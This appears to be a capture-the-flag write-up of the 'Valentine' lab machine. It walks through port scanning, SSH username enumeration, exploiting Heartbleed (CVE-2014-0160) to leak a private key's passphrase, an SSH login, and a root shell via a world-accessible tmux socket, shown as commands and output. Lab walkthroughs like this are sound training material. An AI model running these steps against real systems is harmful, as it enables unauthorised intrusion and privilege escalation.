SYNOPSIS
Valentine is a very unique medium difficulty machine which focuses on the Heartbleed
vulnerability, which had devastating impact on systems across the globe.
Recon
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
โโ$ nmap 10.10.10.79 -T5 -p- -sV -A -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-15 12:53 CEST
Warning: 10.10.10.79 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.79
Host is up (0.040s latency).
Not shown: 65197 closed tcp ports (conn-refused), 335 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_ssl-date: 2022-09-15T10:56:26+00:00; 0s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
We face a Linux machine with a http & https server and a SSH server.
dirbuster
Running a dirbuster
scan, we found some files.
Result of the dirbuster scan
We found a base64 encoded private key from http://10.10.10.79/dev/hype_key.
1
2
3
4
5
6
7
8
9
|
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
[...]
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----
|
Maybe that private key is the one configured on the SSH server. If so we can use it to connect into the SSH server.
Finding vulnerabilities
Running a searchsploit
with the SSH version, we found that it is vulnerable to user enumeration.
1
2
3
4
5
6
7
8
9
10
11
|
โโ$ searchsploit ssh 5.9
--------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
--------------------------------------------------------------- ---------------------------------
|
Get the username
First I need to find the user that owned the key. The file’s name is hype_key
. I tried the exploit with the username hype.
1
2
|
โโ$ python2 45939.py 10.10.10.79 hype
[+] hype is a valid username
|
We got our user hype
!
Trying to connect into SSH
We have a key, a user, let’s try to connect into the SSH server!
1
2
|
โโ$ ssh -i tmp/hype hype@10.10.10.79
Enter passphrase for key 'tmp/hype':
|
But we are asked for the passphrase of the key that we don’t have.
I tried to bruteforce the passphrase using john
.
1
2
3
4
5
6
7
|
โโ$ ssh2john hype > hash
โโ$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
0g 0:00:00:04 DONE (2022-09-15 16:16) 0g/s 3266Kp/s 3266Kc/s 3266KC/sa6_123..*7ยกVamos!
Session completed.
|
I was unable to recover the pass.
SSL Vulnerability
Running nmap scripts, we found that the OpenSSL version used by the server is vulnerable to Heartbleed
1
2
3
4
5
6
7
8
|
โโ$ nmap 10.10.10.79 --script "vuln" -p 22,80,443
[...]
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability ...
| State: VULNERABLE
| Risk factor: High
[...]
|
Heartbleed vulnerability allow an attacker to leak some informations via crafted packets that trigger a buffer over-read.
I tried to exploit Heartbleed using scripts found on github. I found, thanks to this script, a string from the memory.
1
2
3
4
|
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==R..c]......-m.h....V
|
It is a base64 encoded string which gives the string heartbleedbelievethehype
. I tried to connect into SSH server using hype:heartbleedbelievethehype
but it didn’t work.
First shell as hype
Then, I retried to connect using the private key that we found earlier using heartbleedbelievethehype
as passphrase.
1
2
3
4
|
โโ$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i tmp/hype hype@10.10.10.79
hype@Valentine:~$ cat user.txt
*************************a4b2f4c
|
We got our first shell ! We can get the user flag :)
Path to the privesc
Searching on the home directory, we found some command on the .bash_history
file.
1
2
3
4
5
6
7
8
|
hype@Valentine:~$ cat .bash_history
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
[...]
tmux -S /.devs/dev_sess
|
We found some tmux
commands. Trying the last and we are prompted on a root shell!
1
2
3
4
5
6
|
hype@Valentine:~$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/home/hype# cat /root/root.txt
**************************9db6a0
|
We can get the root flag :)
External, SSL, Penetration Tester Level 2, CVE Exploitation, CVE-2014-0160, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Weak Permissions, CVE-2016-5195, Session Handling